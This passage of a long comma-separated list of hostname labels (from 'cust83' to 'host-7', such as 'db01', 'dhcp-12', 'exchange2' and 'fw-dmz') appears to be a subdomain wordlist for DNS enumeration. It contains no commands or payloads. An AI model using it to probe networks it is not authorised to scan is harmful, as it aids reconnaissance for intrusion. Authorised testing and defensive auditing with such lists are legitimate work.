"cust83", "cust84", "cust85", "cust86", "cust87", "cust88", "cust89", "cust9", "cust90", "cust91", "cust92", "cust93", "cust94", "cust95", "cust96", "cust97", "cust98", "cust99", "custom", "customer", "customer-gw", "customers", "customize", "customs", "cv", "cvs", "cvspserver", "cw", "cwa", "cws", "cx", "cx1", "cx2", "cy", "cyan", "cyber", "cyborgs", "cybozu", "cyclone", "cyclops", "cygnus", "cypher", "cypress", "cyprus", "cyrus", "cz", "d", "d0", "d01", "d02", "d03", "d1", "d1-0", "d10", "d11", "d12", "d13", "d14", "d15", "d16", "d17", "d18", "d19", "d2", "d20", "d21", "d22", "d23", "d24", "d25", "d26", "d27", "d28", "d29", "d3", "d30", "d31", "d32", "d33", "d34", "d35", "d36", "d37", "d38", "d39", "d4", "d40", "d41", "d42", "d43", "d44", "d45", "d46", "d47", "d48", "d49", "d5", "d50", "d51", "d52", "d53", "d54", "d55", "d56", "d57", "d58", "d59", "d6", 
"d60", "d61", "d62", "d63", "d64", "d65", "d66", "d67", "d68", "d69", "d7", "d70", "d71", "d72", "d73", "d74", "d75", "d76", "d76-01", "d77", "d78", "d79", "d8", "d80", "d81", "d82", "d83", "d84", "d85", "d86", "d87", "d88", "d89", "d9", "d90", "d91", "d92", "d93", "d94", "d95", "d96", "d97", "d98", "d99", "da", "da1", "da2", "daap", "dad", "daedalus", "daemon", "daffy", "dag", "dagobah", "dagobert", "dahlia", "daily", "daisy", "dakar", "dakota", "dal", "dale", "dalek", "dali", "dallas", "dalton", "dam", "dan", "dana", "dance", "dandelion", "danger", "dani", "daniel", "daniela", "danny", "dante", "danube", "daphne", "darcy", "dark", "darkside", "darkstar", "dart", "darth", "darwin", "das", "dash", "dashboard", "dat", "data", "data1", "data2", "data3", "data4", "data5", "database", "database01", "database02", "database1", "database2", "databases", "datacenter", "datalink", "datalink2", "datametrics", "datanet-gw", "datastore", "datatracker", "date", "datos", "dav", "dave", "david", "davinci", "davis", "dawn", "dax", "day", "daytime", "daytona", "db", "db0", "db01", "db02", "db03", "db04", "db05", "db1", "db10", "db11", "db12", "db2", "db3", "db4", "db5", "db6", "db7", "db8", "db9", "dba", "dbadmin", "dbm", "dbs", "dbs1", "dbserver", "dc", "dc0", "dc01", "dc02", "dc1", "dc2", "dc3", "dc4", "dcanet-gw", "dcc", "dcs", "dd", "dds", "de", "de-cix", "de1", "de2", "dead", "deal", "dealer", "dealers", "dean", "dear", "death", "deathstar", "deb", "debbie", "debian", "debussy", "debye", "dec", "decent", "decix", "ded", "dedi", "dedicated", "dee", "deep", "deepblue", "deepthought", "deer", "def", "default", "default-gw", "defender", "defiant", "definite", "degas", "deimos", "del", "delaware", "delfin", "delight", "deliver", "delivery", "dell", "dell1", "dell2", "delos", "delphi", "delta", "delta1", "dem", "demeter", "demo", "demo1", "demo2", "demo3", "demo4", "demo5", "demon", "demon-gw", "demonstration", "demos", "demostration", "den", "denali", "deneb", "denis", "denise", 
"dennis", "dent", "denver", "deob", "deploy", "depot", "dept", "derby", "derek", "des", "desarrollo", "descargas", "descartes", "desdemona", "desert", "design", "designer", "desire", "desk", "desktop", "despina", "destiny", "destservice", "destservice2", "detail", "detect", "determined", "detroit", "deutschland", "dev", "dev-www", "dev0", "dev01", "dev02", "dev03", "dev1", "dev2", "dev3", "dev4", "dev5", "dev6", "dev7", "deve", "devel", "develop", "developer", "developers", "development", "device", "devil", "devnull", "devon", "devserver", "devsql", "devweb", "dewey", "dexter", "df", "dfw", "dg", "dh", "dhcp", "dhcp-1", "dhcp-10", "dhcp-11", "dhcp-12", "dhcp-13", "dhcp-14", "dhcp-15", "dhcp-16", "dhcp-17", "dhcp-18", "dhcp-19", "dhcp-2", "dhcp-20", "dhcp-21", "dhcp-22", "dhcp-23", "dhcp-24", "dhcp-25", "dhcp-26", "dhcp-27", "dhcp-28", "dhcp-29", "dhcp-3", "dhcp-30", "dhcp-31", "dhcp-32", "dhcp-33", "dhcp-34", "dhcp-35", "dhcp-36", "dhcp-37", "dhcp-38", "dhcp-39", "dhcp-4", "dhcp-40", "dhcp-41", "dhcp-42", "dhcp-43", "dhcp-44", "dhcp-45", "dhcp-46", "dhcp-47", "dhcp-48", "dhcp-49", "dhcp-5", "dhcp-50", "dhcp-51", "dhcp-52", "dhcp-53", "dhcp-54", "dhcp-55", "dhcp-56", "dhcp-57", "dhcp-58", "dhcp-59", "dhcp-6", "dhcp-60", "dhcp-61", "dhcp-62", "dhcp-63", "dhcp-64", "dhcp-65", "dhcp-66", "dhcp-67", "dhcp-68", "dhcp-69", "dhcp-7", "dhcp-70", "dhcp-71", "dhcp-72", "dhcp-73", "dhcp-74", "dhcp-75", "dhcp-76", "dhcp-77", "dhcp-78", "dhcp-79", "dhcp-8", "dhcp-80", "dhcp-81", "dhcp-82", "dhcp-83", "dhcp-84", "dhcp-85", "dhcp-86", "dhcp-87", "dhcp-88", "dhcp-89", "dhcp-9", "dhcp-90", "dhcp-91", "dhcp-92", "dhcp-93", "dhcp-94", "dhcp-95", "dhcp-96", "dhcp-97", "dhcp-98", "dhcp-99", "dhcp-pool", "dhcp0", "dhcp01", "dhcp02", "dhcp03", "dhcp04", "dhcp05", "dhcp06", "dhcp07", "dhcp08", "dhcp09", "dhcp1", "dhcp10", "dhcp11", "dhcp12", "dhcp13", "dhcp14", "dhcp15", "dhcp16", "dhcp17", "dhcp18", "dhcp19", "dhcp2", "dhcp20", "dhcp21", "dhcp22", "dhcp23", "dhcp24", "dhcp25", "dhcp26", 
"dhcp27", "dhcp28", "dhcp29", "dhcp3", "dhcp30", "dhcp31", "dhcp32", "dhcp33", "dhcp34", "dhcp35", "dhcp36", "dhcp37", "dhcp38", "dhcp39", "dhcp4", "dhcp40", "dhcp41", "dhcp42", "dhcp43", "dhcp44", "dhcp45", "dhcp46", "dhcp47", "dhcp48", "dhcp49", "dhcp5", "dhcp50", "dhcp51", "dhcp52", "dhcp53", "dhcp54", "dhcp55", "dhcp56", "dhcp57", "dhcp58", "dhcp59", "dhcp6", "dhcp60", "dhcp61", "dhcp62", "dhcp63", "dhcp64", "dhcp65", "dhcp66", "dhcp67", "dhcp68", "dhcp69", "dhcp7", "dhcp70", "dhcp71", "dhcp72", "dhcp73", "dhcp74", "dhcp75", "dhcp76", "dhcp77", "dhcp78", "dhcp79", "dhcp8", "dhcp80", "dhcp81", "dhcp82", "dhcp83", "dhcp84", "dhcp85", "dhcp86", "dhcp87", "dhcp88", "dhcp89", "dhcp9", "dhcp90", "dhcp91", "dhcp92", "dhcp93", "dhcp94", "dhcp95", "dhcp96", "dhcp97", "dhcp98", "dhcp99", "di", "di1", "dia", "diablo", "diagonal", "dial", "dial-1", "dial-10", "dial-11", "dial-12", "dial-13", "dial-14", "dial-15", "dial-16", "dial-17", "dial-18", "dial-19", "dial-2", "dial-20", "dial-21", "dial-22", "dial-23", "dial-24", "dial-25", "dial-26", "dial-27", "dial-28", "dial-29", "dial-3", "dial-30", "dial-31", "dial-32", "dial-33", "dial-34", "dial-35", "dial-36", "dial-37", "dial-38", "dial-39", "dial-4", "dial-40", "dial-41", "dial-42", "dial-43", "dial-44", "dial-45", "dial-46", "dial-47", "dial-48", "dial-49", "dial-5", "dial-50", "dial-51", "dial-52", "dial-53", "dial-55", "dial-56", "dial-57", "dial-58", "dial-6", "dial-7", "dial-8", "dial-9", "dial1", "dial10", "dial11", "dial12", "dial13", "dial14", "dial15", "dial16", "dial17", "dial18", "dial19", "dial2", "dial20", "dial21", "dial22", "dial23", "dial24", "dial25", "dial26", "dial27", "dial28", "dial29", "dial3", "dial30", "dial4", "dial5", "dial6", "dial7", "dial8", "dial9", "dialin", "dialin1", "dialin2", "dialog", "dialup", "dialup-1", "dialup1", "dialup10", "dialup11", "dialup12", "dialup13", "dialup14", "dialup15", "dialup16", "dialup17", "dialup18", "dialup19", "dialup2", "dialup20", "dialup21", "dialup22", 
"dialup23", "dialup24", "dialup25", "dialup26", "dialup27", "dialup28", "dialup29", "dialup3", "dialup30", "dialup31", "dialup4", "dialup5", "dialup6", "dialup7", "dialup8", "dialup9", "diamant", "diamond", "diana", "diane", "diary", "dias", "dick", "dict", "dido", "die", "diego", "diesel", "diet", "different", "dig", "digi", "digital", "dijkstra", "dilbert", "dill", "dima", "dingo", "dino", "diogenes", "dione", "dionis", "dionysos", "dionysus", "dip", "dir", "dir1", "dirac", "dircproxy", "direct", "director", "directory", "dirk", "dis", "disc", "discard", "disco", "discover", "discovery", "discuss", "discussion", "discussions", "disk", "disney", "dispatch", "display", "dist", "dist02", "distance", "distcc", "distmp3", "distribute", "distributer", "distributers", "distribution", "diva", "dixie", "dizzy", "dj", "django", "dk", "dl", "dl1", "dl2", "dlink", "dls", "dlv", "dm", "dm1", "dmail", "dmc", "dms", "dmta1", "dmz", "dmz-gw", "dmz1", "dmz2", "dn", "dna", "dnews", "dns", "dns-1", "dns-2", "dns-a", "dns-b", "dns-cache1", "dns-cache2", "dns0", "dns00", "dns01", "dns02", "dns03", "dns04", "dns1", "dns10", "dns11", "dns2", "dns3", "dns4", "dns5", "dns6", "dns7", "dns8", "dnsa", "dnsb", "dnscache", "dnscache1", "dnscache2", "dnstest", "do", "do-atman", "doc", "dock", "docs", "doctor", "document", "documentacion", "documentos", "documents", "docushare", "dodge", "dodo", "dog", "dogbert", "dogmatix", "dogwood", "dollar", "dolly", "dolphin", "dom", "dom0", "domain", "domain-controller", "domaincontroller", "domains", "dominio", "dominion", "domino", "domino1", "domino2", "dominoweb", "don", "donald", "donatello", "done", "dong", "donkey", "donna", "dont", "doom", "door", "doors", "dopey", "doppler", "dora", "dorado", "dori", "doris", "dorothy", "dory", "dos", "dot", "dotnet", "double", "doug", "douglas", "dove", "dover", "down", "download", "downloads", "downtown", "dox", "doxygen", "dozer", "dp", "dp1", "dp2", "dpm", "dport", "dps", "dq", "dr", "dr01", "dr02", "dr1", 
"dr2", "draal", "drac", "draco", "dracula", "dragon", "dragonfly", "drake", "dream", "dresden", "drew", "drive", "drm", "drmail", "droopy", "drop", "dropbox", "drucker", "druid", "drum", "drupal", "drweb", "dry", "ds", "ds0-ether", "ds01", "ds02", "ds1", "ds2", "ds3", "ds4", "ds9", "dsc", "dsl", "dsl-gw", "dsl1", "dsl2", "dsl3", "dsl4", "dslam", "dslam0", "dslam1", "dslam2", "dslgw", "dsp", "dspace", "dss", "dt", "dtc", "dti01", "dts", "du", "dual", "dublin", "duck", "dude", "duke", "dumbledore", "dumbo", "dummy", "dump", "duncan", "dune", "duo", "durian", "durin", "dust", "dusty", "dv", "dv4", "dvd", "dvorak", "dvr", "dvr1", "dw", "dwarf", "dx", "dy", "dylan", "dyn", "dyn1", "dyn10", "dyn11", "dyn12", "dyn13", "dyn14", "dyn15", "dyn16", "dyn17", "dyn18", "dyn19", "dyn2", "dyn20", "dyn21", "dyn22", "dyn23", "dyn24", "dyn25", "dyn26", "dyn27", "dyn28", "dyn29", "dyn3", "dyn30", "dyn31", "dyn32", "dyn33", "dyn34", "dyn35", "dyn36", "dyn37", "dyn38", "dyn39", "dyn4", "dyn40", "dyn41", "dyn42", "dyn43", "dyn44", "dyn45", "dyn46", "dyn47", "dyn48", "dyn5", "dyn6", "dyn7", "dyn8", "dyn88", "dyn9", "dyn91", "dyn92", "dyn94", "dynamic", "dynamics", "dynamo", "dynip", "dz", "e", "e-0", "e-com", "e-commerce", "e-learning", "e-mail", "e0", "e0-0", "e0-1", "e0-l", "e01", "e1", "e10", "e11", "e12", "e2", "e20", "e20-2", "e20-3", "e21", "e22", "e23", "e24", "e3", "e4", "e5", "e6", "e7", "e8", "e9", "ea", "eaccess", "ead", "eager", "eagle", "eagle1", "eagle2", "ear", "earl", "earth", "eas", "east", "easy", "eb", "ebill", "ebiz", "ebony", "ebook", "ebs", "ebusiness", "ec", "ec1", "ec2", "ecf", "echelon", "echidna", "echo", "eclass", "eclipse", "ecm", "eco", "eco1", "ecom", "ecommerce", "econ", "ecs", "ed", "ed1", "ed10", "ed11", "ed12", "ed13", "ed14", "ed15", "ed16", "ed17", "ed18", "ed19", "ed2", "ed20", "ed21", "ed22", "ed23", "ed24", "ed25", "ed26", "ed27", "ed28", "ed29", "ed3", "ed30", "ed31", "ed32", "ed33", "ed34", "ed35", "ed36", "ed37", "ed38", "ed39", "ed4", "ed40", 
"ed41", "ed42", "ed43", "ed44", "ed45", "ed46", "ed47", "ed48", "ed49", "ed5", "ed50", "ed51", "ed52", "ed53", "ed54", "ed55", "ed56", "ed57", "ed58", "ed59", "ed6", "ed60", "ed61", "ed62", "ed63", "ed64", "ed65", "ed66", "ed67", "ed68", "ed69", "ed7", "ed70", "ed71", "ed72", "ed73", "ed74", "ed75", "ed76", "ed77", "ed78", "ed79", "ed8", "ed80", "ed81", "ed82", "ed83", "ed84", "ed85", "ed86", "ed87", "ed88", "ed89", "ed9", "ed90", "ed91", "ed92", "ed93", "ed94", "ed95", "ed96", "ed97", "ed98", "ed99", "eddie", "eddy", "eden", "edgar", "edge", "edge01", "edge1", "edge2", "edge3", "edi", "edison", "edit", "editor", "edm", "edna", "edoc", "eds", "edu", "education", "eduroam", "edward", "ee", "eel", "eeyore", "ef", "effect", "effective", "efnet", "eg", "egg", "eggdrop", "egret", "egroups", "egypt", "eh", "ehx", "ei", "eiger", "eight", "einstein", "eip", "eis", "ej", "ejemplo", "ejemplos", "ek", "eklogin", "el", "elaine", "elara", "elba", "elbe", "eldorado", "elearn", "elearning", "electra", "electro", "electron", "elektra", "element", "elena", "elephant", "eleven", "elf", "elgar", "eli", "elias", "elisa", "elite", "elizabeth", "elk", "ella", "ellen", "ellis", "elm", "elmer", "elmo", "elpaso", "elrond", "els", "elsa", "elvira", "elvis", "elwood", "em", "em0", "em1", "em2", "ema", "email", "email1", "email2", "email3", "email4", "emails", "emailsecurity", "emc", "emerald", "emerson", "emi", "emil", "emily", "emkt-ip01", "emkt-ip02", "emkt-ip03", "emkt-ip04", "emkt-ip05", "emkt-ip06", "emm", "emma", "emp", "emperor", "empire", "employee", "employees", "empresa", "empresas", "empty", "ems", "ems1", "emu", "en", "en0", "en01", "enable", "enbd-cstatd", "enbd-sstatd", "enc", "enceladus", "encoder", "encore", "end", "endeavor", "endeavour", "ender", "endor", "energy", "enews", "eng", "eng01", "eng1", "engine", "engineer", "engineering", "english", "eniac", "enigma", "enough", "enroll", "enrutador", "ensim", "ent", "enter", "enterprise", "entropy", "entry", "enum", "envy", 
"enzo", "eo", "eomer", "eon", "eos", "eowyn", "ep", "epaper", "epay", "epi", "epic", "epimetheus", "epm", "epo", "eportal", "eportfolio", "epost", "epp", "eprints", "eps", "epsilon", "epson", "epzilon", "eq", "equal", "equation", "equinix-paris", "equinox", "equivalent", "er", "er1", "era", "erasmus", "erato", "erbium", "erde", "erdos", "erebus", "eric", "erica", "eridanus", "erie", "erik", "erika", "erin", "eris", "ermis", "ernie", "ernst", "eroom", "eros", "erp", "error", "erwin", "es", "es1", "es2", "esa", "esa1", "esa2", "esafe", "esb", "esc", "escape", "escher", "esd", "eservice", "eservices", "eshop", "esm", "esmeralda", "esp", "espanol", "espresso", "ess", "essential", "essex", "est", "estadisticas", "esther", "estimate", "estore", "esx", "esx01", "esx02", "esx03", "esx04", "esx1", "esx2", "esx3", "esx4", "esx5", "esx6", "esxi", "esxi01", "esxi1", "esxi2", "et", "et0", "et0-0", "et1", "et2", "eta", "etc", "eth", "eth-0", "eth-14", "eth-15", "eth-16", "eth-2", "eth-21", "eth-22", "eth-23", "eth-24", "eth-25", "eth-26", "eth-27", "eth-29", "eth-3", "eth-31", "eth-32", "eth-33", "eth-34", "eth-35", "eth-36", "eth-37", "eth-38", "eth-39", "eth-4", "eth-5", "eth-6", "eth-65", "eth-68", "eth-69", "eth-7", "eth-71", "eth-78", "eth-8", "eth-81", "eth0", "eth0-0", "eth1", "eth2", "eth3", "ether", "ether1", "ethernet", "ethernet0", "ethernet0-0", "ethernet2", "ethernet2-0", "ethernet3-0", "etna", "etrn", "ets", "eu", "eu1", "eu2", "euclid", "eugene", "euklid", "euler", "eunet-gw", "eunomia", "eureka", "euro", "europa", "europe", "europium", "euterpe", "ev", "eva", "eval", "evaluate", "evans", "eve", "even", "event", "eventos", "events", "everest", "evergreen", "everything", "evil", "evo", "evolution", "ew", "ewa", "ews", "ex", "ex01", "ex1", "ex2", "exact", "exam", "example", "examples", "exc", "excalibur", "excel", "excelsior", "exch", "exch01", "exch1", "exch2", "exchange", "exchange-server", "exchange-server2", "exchange01", "exchange02", "exchange1", "exchange2", 
"exchange3", "exclusive", "exec", "exeter", "exit", "exmail", "exodus", "exp", "expand", "experience", "expert", "explicit", "explore", "explorer", "expo", "export", "express", "expresso", "ext", "ext-gw", "ext-nat", "ext1", "ext2", "ext3", "extension", "extern", "external", "extmail", "extra", "extranet", "extranet2", "extreme", "ey", "eye", "eyes", "eyigw", "ez", "ezproxy", "f", "f0", "f0-0", "f0-1", "f00", "f01", "f1", "f1-0", "f10", "f11", "f12", "f14", "f15", "f2", "f20", "f3", "f4", "f5", "f6", "f7", "f8", "f9", "fa", "fa-0-0", "fa0", "fa0-0", "fa0-1", "fa1-0", "fa2-0", "face", "facebook", "facilities", "facility", "fact", "factory", "faculty", "failover", "fair", "faith", "faithful", "falbala", "falco", "falcon", "fall", "fallback", "family", "famous", "fan", "fang", "fangorn", "fantastic", "faq", "far", "faraday", "faramir", "fargo", "farm", "farmer", "farnsworth", "faro", "fas0-0", "fast", "fastethernet0", "fastethernet0-0", "faststats", "fat", "fatboy", "father", "fatserv", "fault-mgmt", "fault-mgmt2", "faust", "fax", "faxserver", "fay", "fb", "fc", "fc1", "fc2", "fcs", "fd", "fe", "fe0", "fe0-0", "fe0-1", "fe01", "fe02", "fe03", "fe04", "fe05", "fe1", "fe1-0", "fe10", "fe11", "fe12", "fe2", "fe2-0", "fe3", "fe3-0", "fe4", "fe4-0", "fe5", "fe5-0", "fe6", "fe7", "fe8", "fear", "feather", "feature", "fed", "federation", "fedora", "feed", "feed1", "feedback", "feeds", "felix", "femto", "fender", "fenix", "fennel", "fenrir", "fenris", "fermat", "fermi", "fermion", "fern", "fernando", "ferrari", "ferret", "feynman", "ff", "fg", "fh", "fi", "fiber", "fiber-channel", "fiber-channel2", "fiberlink", "fibonacci", "fido", "field", "fig", "figaro", "fiji", "file", "file1", "filemaker", "filer", "filer1", "filer2", "files", "filesender", "fileserv", "fileserver", "fileshare", "filestore", "filetransfer", "film", "filter", "filter1", "filter2", "fin", "finance", "finch", "find", "fine", "finger", "finn", "fiona", "fir", "fire", "fire1", "fire2", "fireball", "firebird", 
"firebox", "firefly", "firepass", "firewall", "firewall1", "firewall2", "firma", "first", "firstclass", "fis", "fischer", "fish", "fisher", "fit", "five", "fix", "fixes", "fj", "fk", "fl", "flag", "flame", "flamingo", "flanders", "flare", "flash", "flat", "flea", "fleet", "fleming", "flex", "flexo", "flight", "flint", "flip", "flipper", "flo", "float", "flood", "flor", "flora", "florence", "florida", "flounder", "flow", "flower", "floyd", "fluent", "fluffy", "fluid", "fluke", "fluorine", "flush", "flute", "flux", "fly", "fm", "fmp", "fms", "fn", "fo", "fobos", "focus", "fog", "foghorn", "fold", "folders", "font-service", "foo", "foobar", "food", "foot", "football", "footer", "for", "force", "ford", "foreign", "forest", "forever", "forge", "fork", "form", "formacion", "format", "forms", "formula", "fornax", "foro", "foros", "fort", "forte", "fortimail", "fortress", "fortuna", "fortworth", "forum", "forums", "forward", "foster", "foto", "fotos", "foundation", "foundry", "four", "fourier", "fox", "foxtrot", "fozzie", "fp", "fp1", "fq", "fr", "fr1", "fr2", "fr3", "fractal", "frame", "frame-relay", "frame-relay2", "france", "francis", "francium", "frank", "frankfurt", "frankie", "franklin", "franz", "fred", "freddy", "free", "freebox", "freebsd", "freebsd0", "freebsd01", "freebsd02", "freebsd1", "freebsd2", "freedom", "freedommail", "freemail", "freeman", "freenas", "freeware", "freja", "fremont", "frequency", "fresh", "fresnel", "fresno", "freud", "freya", "frida", "friday", "friend", "friendly", "friends", "frigg", "fritz", "frodo", "frog", "from", "front", "front1", "front2", "frontdesk", "frontend", "frontier", "frontpage", "frost", "frox", "frozen", "frugal", "fruit", "fry", "fs", "fs01", "fs02", "fs1", "fs2", "fs3", "fs4", "fsp", "fss", "ft", "ftb", "ftir", "ftp", "ftp-", "ftp-data", "ftp0", "ftp01", "ftp02", "ftp1", "ftp2", "ftp3", "ftp4", "ftp5", "ftp6", "ftpd", "ftps", "ftps-data", "ftpsbkup", "ftpserver", "ftptest", "fts", "fu", "fuchs", "fuck", "fuel", 
"fugu", "fuji", "full", "fun", "funk", "funny", "fury", "fusion", "future", "fuzzy", "fv", "fw", "fw-1", "fw-dmz", "fw-ext", "fw0", "fw00", "fw01", "fw02", "fw03", "fw1", "fw1-gw", "fw2", "fw3", "fw4", "fw5", "fwall", "fwsm", "fwsm0", "fwsm01", "fwsm1", "fx", "fxp0", "fy", "fz", "g", "g0", "g0-0", "g0-1", "g0-2", "g0-26", "g0-3", "g01", "g1", "g1-1", "g1-2", "g10", "g2", "g2-0", "g3", "g4", "g4-0", "g5", "g6", "g7", "ga", "gabi", "gabriel", "gadget", "gaea", "gaia", "gal", "gala", "galactica", "galadriel", "galahad", "galatea", "galaxy", "gale", "galena", "galeria", "galerias", "galerie", "galilei", "galileo", "gallant", "galleries", "gallery", "gallium", "galois", "gama", "gambit", "game", "game1", "game2", "games", "gameserver", "gaming", "gamma", "gandalf", "ganesh", "ganesha", "ganges", "ganr", "ganymed", "ganymede", "gap", "gar", "garage", "garcia", "garden", "garfield", "gargamel", "gargoyle", "garlic", "garnet", "garuda", "gary", "gas", "gast", "gaston", "gate", "gate01", "gate02", "gate1", "gate2", "gate3", "gate4", "gate5", "gatekeeper", "gatekeeper2", "gates", "gateway", "gateway01", "gateway02", "gateway1", "gateway2", "gateway3", "gateway4", "gator", "gaudi", "gauguin", "gauntlet", "gauss", "gazelle", "gb", "gc", "gd", "gdomap", "gds_db", "ge", "ge-0", "ge-0-0-0-0", "ge-dr1", "ge0", "ge0-0", "ge0-1", "ge0-2", "ge0-3", "ge1", "ge1-0", "ge1-1", "ge1-2", "ge1-3", "ge1-4", "ge11", "ge13", "ge17-0", "ge18-0", "ge2-0", "ge2-1", "ge2-2", "ge3-0", "ge3-1", "ge3-2", "ge4-0", "ge4-1", "ge5-0", "ge5-1", "ge5-2", "ge6-1", "gea", "geb", "gecko", "ged", "geek", "gem", "gemini", "gemini01", "gemini03", "gemma", "gen", "gene", "general", "generic", "genesis", "geneva", "genie", "genius", "genome", "gentle", "gentoo", "geo", "geo1", "george", "georgia", "ger", "germanium", "germany", "geronimo", "gershwin", "gestion", "get", "getafix", "geth0", "gf", "gforge", "gg", "ggz", "gh", "ghost", "gi", "gi-0-1", "gi0-0", "gi0-1", "gi0-2", "gi0-3", "gi1-1", "gi1-2", "gi1-3", 
"gi1-4", "gi1-7", "gi2-0", "gi2-1", "gi3-1", "gi3-2", "gi3-3", "gi4-1", "gi5-1", "gi5-2", "giant", "gibbs", "gibson", "gift", "gifted", "gig0-1", "gig0-2", "gig0-3", "gig01", "gig17-0", "gig18-0", "gig2-1", "gig2-2", "gig2-3", "gig2-4", "giga", "gigabitethernet0", "gigabitethernet0-0", "gigabitethernet0-1", "gigabitethernet0-2", "gigabitethernet1", "gigabitethernet2", "gige-g0-1", "gige-gbge0", "gilbert", "gilford", "gimli", "gin", "gina", "ginger", "ginkgo", "giotto", "gir", "giraffe", "gis", "gis1", "gis2", "git", "give", "gizmo", "gj", "gk", "gk1", "gl", "glacier", "glad", "gladiator", "glados", "glasgow", "glass", "glendale", "glenn", "global", "globe", "globus", "gloin", "gloria", "glorious", "glory", "glow", "gluon", "gm", "gmail", "gms", "gn", "gnat", "gnome", "gnu", "gnutella-rtr", "gnutella-svc", "go", "goat", "goblin", "god", "godel", "godzilla", "goedel", "goethe", "gogrid", "gold", "golden", "golden-gw", "goldfish", "goldmine", "golem", "golf", "goliat", "goliath", "gollum", "gomez", "gondor", "gonzo", "good", "goodhue", "goofy", "google", "goose", "gopher", "gordon", "gorgon", "gorilla", "gort", "got", "gouda", "gov", "goya", "gozer", "gp", "gprs", "gprs2", "gps", "gpsd", "gq", "gr", "gra", "grace", "grad", "grade", "graham", "grain", "granada", "grand", "granite", "grant", "grape", "grapefruit", "graph", "graphics", "graphite", "graphs", "grass", "grasshopper", "grateful", "graviton", "gravity", "gray", "great", "green", "greg", "gregory", "gremlin", "grendel", "grey", "grid", "grid1", "grieg", "griffin", "grimlock", "grizzly", "grnetrouter", "gromit", "groove", "groucho", "ground", "group", "grouper", "groups", "groupware", "groupwise", "grouse", "grover", "growth", "grumpy", "grus", "gryphon", "gs", "gs1", "gs2", "gsa", "gsm", "gsx", "gt", "gts", "gtw", "gu", "guard", "guardian", "guava", "guest", "guest1", "guest2", "guest3", "guest4", "guests", "guia", "guide", "guido", "guinness", "guitar", "gull", "gumby", "guppy", "guru", "gus", "gustav", 
"gutenberg", "guy", "gv", "gvt-l0", "gw", "gw-1", "gw-2", "gw-dmz", "gw-ext", "gw-ipv6", "gw-ll", "gw-ndh", "gw0", "gw01", "gw02", "gw03", "gw04", "gw1", "gw10", "gw11", "gw12", "gw13", "gw14", "gw15", "gw16", "gw2", "gw20", "gw3", "gw4", "gw5", "gw6", "gw7", "gw8", "gw9", "gwa", "gwb", "gwia", "gwmail", "gwmobile", "gws", "gww", "gwweb", "gx", "gy", "gypsy", "gz", "h", "h0", "h01", "h02", "h03", "h04", "h05", "h06", "h08", "h1", "h10", "h11", "h12", "h13", "h14", "h15", "h16", "h17", "h18", "h19", "h2", "h20", "h21", "h22", "h23", "h24", "h25", "h26", "h27", "h28", "h29", "h2o", "h3", "h30", "h31", "h32", "h33", "h34", "h35", "h36", "h37", "h38", "h39", "h4", "h40", "h41", "h42", "h43", "h44", "h45", "h46", "h47", "h48", "h49", "h5", "h50", "h51", "h52", "h53", "h54", "h55", "h56", "h57", "h58", "h59", "h6", "h60", "h61", "h62", "h63", "h64", "h65", "h66", "h67", "h68", "h69", "h7", "h70", "h71", "h72", "h73", "h74", "h75", "h76", "h77", "h78", "h79", "h8", "h80", "h81", "h82", "h83", "h84", "h85", "h86", "h87", "h88", "h89", "h9", "h90", "h91", "h92", "h93", "h94", "h95", "h96", "h97", "h98", "h99", "ha", "ha1", "ha2", "habanero", "hack", "hacked", "hacker", "hadar", "haddock", "hades", "hadrian", "hadron", "hafnium", "hagrid", "hahn", "hail", "hal", "halflife", "hall", "halley", "halo", "ham", "hamburg", "hamilton", "hamlet", "hammer", "hammerhead", "hamster", "han", "hana", "hancock", "hand", "handel", "handy", "hank", "hanna", "hannah", "hannibal", "hans", "hansolo", "happy", "haproxy", "har", "harbor", "hard", "hardy", "hare", "harley", "harmony", "harold", "harp", "harpo", "harrier", "harris", "harrison", "harry", "harvey", "has", "hat", "hathor", "havana", "haven", "hawaii", "hawk", "hawkeye", "hawking", "haydn", "hayes", "hazel", "hb", "hc", "hd", "hd2", "he", "head", "header", "health", "healthy", "heart", "heat", "heather", "heaven", "hebe", "hecate", "hector", "hedgehog", "hedwig", "hegel", "heidi", "heimdall", "heisenberg", "hektor", "hel", "helen", 
"helena", "helene", "helga", "helios", "helium", "helix", "hell", "hello", "helm", "helmholtz", "helo", "help", "helpdesk", "helpdesk2", "helpful", "helponline", "helsinki", "hemera", "hemlock", "hen", "hendrix", "henry", "hephaestus", "hephaistos", "hera", "heracles", "herakles", "herb", "herbert", "hercule", "hercules", "heritage", "herkules", "herman", "hermes", "hermes2", "hermione", "hero", "heron", "herring", "hertz", "hestia", "hetzner", "hex", "hey", "hf", "hg", "hh", "hi", "hibiscus", "hickory", "hidden", "hide", "higgs", "high", "hikari", "hilbert", "hill", "himalaya", "himalia", "hip", "hippo", "hiring", "hiro", "his", "history", "hit", "hive", "hj", "hk", "hkp", "hl", "hm", "hmc", "hme1", "hmmp-ind", "hn", "ho", "hobbes", "hobbit", "hobby-gw", "hockey", "hod", "hogwarts", "hold", "hole", "holiday", "holly", "hollywood", "holmes", "home", "home1", "home2", "homebase", "homepage", "homepages", "homer", "honda", "honest", "honey", "honeypot", "hongkong", "honolulu", "hood", "hook", "hoover", "hop", "hope", "hopeful", "hopper", "horatio", "horde", "horizon", "horn", "hornet", "horse", "horst", "horton", "horus", "hos", "hos-tr1", "hos-tr2", "hos-tr3", "hos-tr4", "hospital", "host", "host-0", "host-01", "host-1", "host-10", "host-11", "host-12", "host-13", "host-14", "host-15", "host-16", "host-17", "host-18", "host-19", "host-1_static", "host-2", "host-20", "host-21", "host-22", "host-23", "host-24", "host-25", "host-26", "host-27", "host-28", "host-29", "host-2_static", "host-3", "host-30", "host-31", "host-32", "host-33", "host-34", "host-35", "host-36", "host-37", "host-38", "host-39", "host-4", "host-40", "host-41", "host-42", "host-43", "host-44", "host-45", "host-46", "host-47", "host-48", "host-49", "host-5", "host-50", "host-51", "host-52", "host-53", "host-54", "host-55", "host-56", "host-57", "host-58", "host-59", "host-6", "host-60", "host-61", "host-62", "host-63", "host-64", "host-65", "host-66", "host-67", "host-68", "host-69", "host-7", 
